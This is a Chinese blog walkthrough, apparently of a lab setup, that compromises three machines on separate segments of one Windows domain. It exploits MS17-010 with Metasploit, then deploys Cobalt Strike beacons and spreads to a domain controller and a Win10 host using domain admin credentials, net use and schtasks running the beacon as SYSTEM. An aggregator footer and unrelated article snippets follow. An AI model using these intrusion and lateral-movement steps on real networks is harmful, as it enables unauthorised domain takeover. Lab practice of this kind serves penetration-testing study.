CS_上线三层跨网段机器(完整过程还原)

以前讲过用cs_smb_beacon上线不出网机器,但是真实的网络拓扑肯定不止这么一层的网络

所以我就来搭建一个复杂一点的网络环境!!

当然了,这三台电脑之间都是不同的网段,(但是同属于一个域环境!!)

来看网络拓扑!!

1.先拿下web机器

这里拿下的方式有很多种,那么我就先讲最简单的一种,没错又是永恒之蓝,但是现实生活中肯定是不会将一台存在永恒之蓝的win7作为web机器的!!

kali:

msfconsole
search ms17-010
use 0
set rhost 192.168.43.131
exploit

成功拿下shell 

于是先上线到cs!! 监听器,木马这些我就不多说原理了

 记得选上这个没有(stagless)的木马

然后上传,点击上线,可谓是一气呵成!!!    

这样,我们就上线了第一台web机器!!!

2.拿下二层不出网DC

这里我选择生成的监听器还是smb的beacon 

然后木马那里就要选择带有stageless的那个木马了,然后先上传到web机器!!!

然后就是我们熟悉的颁布计划任务了!!!

net use \\192.168.2.129\ipc$  "hongrisec@2024" /user:god\administratorshell net use shell copy beacon.exe \\192.168.2.129\c$shell schtasks /create /s 192.168.2.129 /tn beacon /sc onstart /tr c:\beacon.exe /ru system /fshell schtasks /run /s 192.168.2.129 /i /tn "beacon"link 192.168.2.129

这样就能上线了第二层不出网的域控!!!

3.上线第三层不出网Win10

这里的操作和前面的操作不一样,前面的连接都是用的正向连接,现在我们来玩一下反向连接

先在cs执行以下操作,选择转发上线!!!

然后你生成一个监听器就是记住你的端口别冲突了!!

然后就是生成以这个为监听器的木马,并且颁布计划任务了

net use \\192.168.1.130\ipc$  "hongrisec@2024" /user:god\administratorshell net use shell copy last.exe \\192.168.1.130\c$shell schtasks /create /s 192.168.1.130 /tn last /sc onstart /tr c:\last.exe /ru system /fshell schtasks /run /s 192.168.1.130 /i /tn "last"link 192.168.1.130

最后是能看见是能够以last.exe去上线这个木马的!!! 

可以看见是能够执行命令的

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/496277.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Acwing数学与简单DP(二)

摘花生 原题链接:https://www.acwing.com/problem/content/1017/ 最后一步,有两种可能: 从上面走从下面走 也就是max(dp[i-1][j],dp[i][j-1]),再加上最后一个位置的值。 #include"bits/stdc.h"using namespace std;i…

pandas两列或多列全组合

现有星期、国家、标签三类数据,希望得到全部组合,实现方式如下: #星期和国家全组合 a1pd.DataFrame(indexrange(7),columns[星期],datanp.arange(0,7)) b1pd.DataFrame(data[美国,新加坡],columns[国家]) c1pd.DataFrame(data[a,b],columns[…

HTTP 的 multipart 类型

上一篇文章讲到 http 的 MIME 类型 http MIME 类型 里有一个 multipart 多部分对象集合类型,这个类型 http 指南里有讲到:MIME 中的 multipart(多部分)电子邮件报文中包含多个报文,它们合在一起作为单一的复杂报文发送…

11 Redis之高并发问题(读+写) + 缓存预热+分布式锁

8. 高并发问题 Redis做缓存虽减轻了DBMS的压力,减小了RT(Response Time),但在高并发情况下也是可能会出现各种问题的。 8.1 缓存穿透 当用户访问的数据既不在数据库中也不在缓存中,如id为“-1”的数据或id为特别大不存在的数据, 这时的用户…

【数据结构和算法】5.超详解析,带你手撕单向链表(图文解析,附带源码)

欢迎来sobercq的博客喔,本期系列为【数据结构和算法】5.超详解析,带你手撕单向链表(图文解析,附带源码),带大家理解单向链表在内存中的分布,以及链表的实现,最后还会有源码分享&…

CSS——PostCSS简介

文章目录 PostCSS是什么postCSS的优点补充:polyfill补充:Stylelint PostCSS架构概述工作流程PostCSS解析方法PostCSS解析流程 PostCSS插件插件的使用控制类插件包类插件未来的CSS语法相关插件后备措施相关插件语言扩展相关插件颜色相关组件图片和字体相关…

FOD8342TR2采用拉伸体 SOP6引脚 3.0A输出电流,高速门极驱动光耦合器

FOD8342TR2概述: FOD8342TR2是一款 3.0 A 输出电流门极驱动光耦合器,能够驱动中等功率 IGBT/MOSFET。它适用于电机控制逆变器应用和高性能电源系统中使用的功率 IGBT 和 MOSFET 的快速开关驱动。FOD8342TR2利用拉伸体封装,可实现 8 毫米的漏…

绘图提高篇 | Python-R-三相元图(ternary plots)绘制

这期推文,我们将介绍如何使用Python和R制作三相元图( ternary plots),涉及的知识点如下: Python-ternary包绘制三相元图 R-ggtern包绘制三相元图 所有完整代码都已整理之我们的线上课程,有需要的同学v yidianshuyulove 咨询 Python-terna…

百科词条创作的意义是什么?有什么作用?

如今,作为一种重要的知识传播媒介,百科词条的创作起着重要的作用 1、百科词条创作的意义和作用是什么? 1.知识的收集与整理 2.凝聚智慧的结晶 3.促进学术交流与合作与合作 二、创建百科词条的重要性 1.丰富知识资源 2.提高信息准确性 …

考研数据结构算法机试训练1

中南大学上机压轴题 测试数据: 3 500 0.6 100 0.8 200 0.7 100 输出 390首先要对输入的折扣进行排序,优先使用比率低的z进行支付。 然后用lowcost记录目前多少钱是打过折的。T-lowcost就是剩余没打折的。 每次循环用上一个人的折扣额度。若所有人折扣额…

Docker 常用操作命令备忘

Docker 一旦设置好了环境,日常就只要使用简单命令就可以运行和停止。 于是,我每次用的时候,都想不起来一些关键性的命令到底怎么用,特此记录。 一、镜像管理 从公有仓库拉取镜像 (对于使用苹果电脑 M1/M2/M3 芯片的 …

Proxmox ve(PVE) 显示CPU和硬盘温度、UPS信息

1.安装CPU温度检测软件sensors apt install lm-sensors -y 传感器探测,命令:sensors-detect 全部选择yes即可,可能其中一个地方提示 ENTER,按 回车键 即可 2.查看一下温度信息 sensors 3.修改 /usr/share/perl5/PVE/API2/Nod…